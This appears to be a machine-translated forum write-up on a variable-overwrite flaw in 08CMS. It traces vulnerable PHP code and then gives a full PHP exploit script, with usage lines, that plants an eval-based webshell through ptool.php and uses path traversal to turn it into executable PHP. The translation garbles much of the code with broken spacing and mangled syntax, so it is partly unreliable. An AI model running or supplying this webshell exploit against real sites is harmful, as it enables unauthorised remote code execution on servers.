Getshell and other problems caused by 08CMS variable Overwrite

I am also a beginner. What is wrong with php? I hope you can tell me the mistake... ========================================================== ============================================/Include/general. inc. php lines 21-26

(isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) && exit('08cms Error');if(!QUOTES_GPC && $_FILES) $_FILES = maddslashes($_FILES);foreach(array('_GET','_POST') as $_request){foreach($$_request as $k => $v){$k{0} != '_' && $$k = maddslashes($v);}}

This is easy to write, but we can submit it when the variable is not initialized. Let's take a look at the Index. php file.

Include_once dirname (_ FILE __). '/include/general. inc. php'; include_once M_ROOT. '. /include/common. fun. php '; if_siteclosed (); mobile_open () | message ('mobile phone version not open'); parse_str (un_virtual ($ _ SERVER ['query _ string']), $ temparr);/* let's look at the code $ _ SERVER ['query _ string'] to obtain the query string .. For example, xx. php? Id = 222 then he gets id = 222un_virtual. This function is used to filter and obtain the query string. Let's take a look at the function un_virtual ($ str ){...... $ str = str_replace (array ('/', '-'), array ('&', '='), $ str ); replace/and-with & and = ...... return $ str;} parse_str () parses the query string to the variable to store the variable $ temparr. Let's take a look at the following: $ _ da = array (); if (! $ Cnstr) {$ tplname =$ _ ismobile? $ O_index_tpl: $ hometpl; // $ tplname defined here $ _ da ['rss '] = $ cms_abs. 'rss. php '; $ _ da + = $ temparr; // $ _ da = $ _ da + $ temparr unset ($ temparr); // destroy the variable extract ($ _ da, EXTR_OVERWRITE); // The variable overwrite so that we can control the variable $ tplname tpl_refresh ($ tplname); // This tpl_refresh function is the place where we want to use it to see what we wrote */

\ Include \ refresh. fun. php Line 2

Function tpl_refresh ($ tplname) {global $ templatedir, $ debugtag; $ tdir = M_ROOT. "template/$ templatedir/"; $ cacf = $ tdir. 'pcache /'. $ tplname. '. php '; // if (file_exists ($ x = $ tdir. "function/utags. fun. php ") include_once $ x; // here, of course, you can also use the truncation mmkdir ($ cacf, 0, 1); if ($ debugtag |! File_exists ($ cacf) {// easy process $ str = load_tpl ($ tplname); // check whether the function name is the content returned when the file is opened/* load_tp: include \ refresh. fun. php row 1137 $ tpl = @ file2str (M_ROOT. "template/$ templatedir /". $ tplname); // file2str this is the function for opening the file. I will not paste $ rt & $ tpl = preg_replace ("/\ {tpl \ $ (. + ?) \}/Ies "," rtagval ('\ 1',' $ rt ') ", $ tpl ); filter without pressure */$ str = preg_replace ("/<\\? (?! Php \ s | = | \ s)/I ", '<? = \ '<? \ '?> ', $ Str); // still no pressure $ str = preg_replace ("/\ <\! \-\ {(. + ?) \}\-\>/S "," {\\ 1} ", $ str); breplace ($ str,''); nreplace ($ str ); quit_refresh_var (); $ str = tpl_basecode ($ str); // the above Code filters str2file ($ str, $ cacf ); // This is the file write function and will not be pasted} unset ($ str, $ tdir, $ cacf );}

With this, we can write files, but there are still some restrictions.

$cacf = $tdir.'pcache/'.$tplname.'.php';  $str = load_tpl($tplname);$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);

$ Tplname is controlled by us. We can upload an image to generate a file. We can also find other places where wood is generated \ tools \ ptool. php.

$ Cf = M_ROOT. '. /dynamic/stats/aclicks. cac '; $ ct = M_ROOT. '. /dynamic/stats/aclicks_time.cac ';/* omitted */if (@ $ fp = fopen ($ cf, 'A') {fwrite ($ fp, "$ aid \ n"); fclose ($ fp); aid is not initialized. We can submit

8 aid is not initialized. We can submit it. Now we can submit the Write File, but there is still a restriction that it cannot jump out of the Directory because the filter at the beginning (the code at the beginning) parse_str (un_virtual ($ _ SERVER ['query _ string']), $ temparr ); however, because the parse_str function will automatically decode the url, we can add a url encoding to bypass the un_virtual filter ~ This cms still has many problems .. It may be a mistake to write an exp for new users:

<? Php/* car CMS4.1 GBK: exp index. php? Tplname = .. % 252f .. % 252 fdynamic % 252 fstats % 252faclicks. cacshell/dynamic/tplcache/common /.... dynamicstatsaclicks. cac. php decoration CMS: shell:/dynamic/stats/aclicks. cac. php */$ exp = '/tools/ptool. php? Aid = % 3C % 3 Fphp % 20 eval % 28% 24_POST % 5Ba % 5D % 29% 3B % 3F % 3E '; $ exp1 ='/index. php? Tplname = .. % 2f .. % 2 fdynamic % 2 fstats % 2faclicks. cac '; if ($ argc <2) {print_r (' + --------------------------------------------------------------------------- +) _ | _/| _ ______/□□\_ blank-// \ 20 \ _________ \_/>_//>_\________________ | [+] php '. $ argv [0]. '[url] www.08sec.com [/url] + ----------------------------------------------------------------------- +'); exit;} error_reporting (E_ERROR); set _ Time_limit (0); $ host = $ argv [1]; go ($ host); function go ($ host) {global $ exp, $ exp1; $ re = Send ($ host, $ exp); stripos ($ re, "MySQL")> 0? Send ($ host, $ exp): ""; $ re = Send ($ host, $ exp1) and stripos ($ re, "aclicks. cac")> 0? Exit ("+ Exploit Success! \ R \ n + http: // $ host/template/dynamic/stats/aclicks. cac. php \ r \ n "): exit ("-Exploit Failed! \ N ");} function Send ($ host, $ url) {$ data =" GET $ url HTTP/1.1 \ r \ n "; $ data. = "Host: $ host \ r \ n"; $ data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en] \ r \ n"; $ data. = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n"; $ data. = "Content-Type: application/x-www-form-urlencoded \ r \ n"; $ data. = "Accept-Language: en-us \ r \ n"; $ data. = "Connection: C Lose \ r \ n "; $ fp = @ fsockopen ($ host, 80); if (! $ Fp) {die ("[-] Connect to host Error \ r \ n");} fwrite ($ fp, $ data); $ back = ''; while (! Feof ($ fp) {$ back. = fread ($ fp, 1024) ;}fclose ($ fp); return $ back ;}?>

Some versions need to be converted to 2 because some of them have decoded the car CMS4.1 GBK version: exp index. php? Tplname =... % 252f .. % 252 fdynamic % 252 fstats % 252faclicks. cacshell/dynamic/tplcache/common /.... Dynamicstatsaclicks. cac. php decoration CMS: shell:/dynamic/stats/aclicks. cac. php attaches an HTML uploaded code

[mw_shl_code=html,true]
 
(Because 08cms version many article versions are of the automotive 4.3 UTF-8 version) ====================================================== sorry... Finally, I refused to reach out to the party!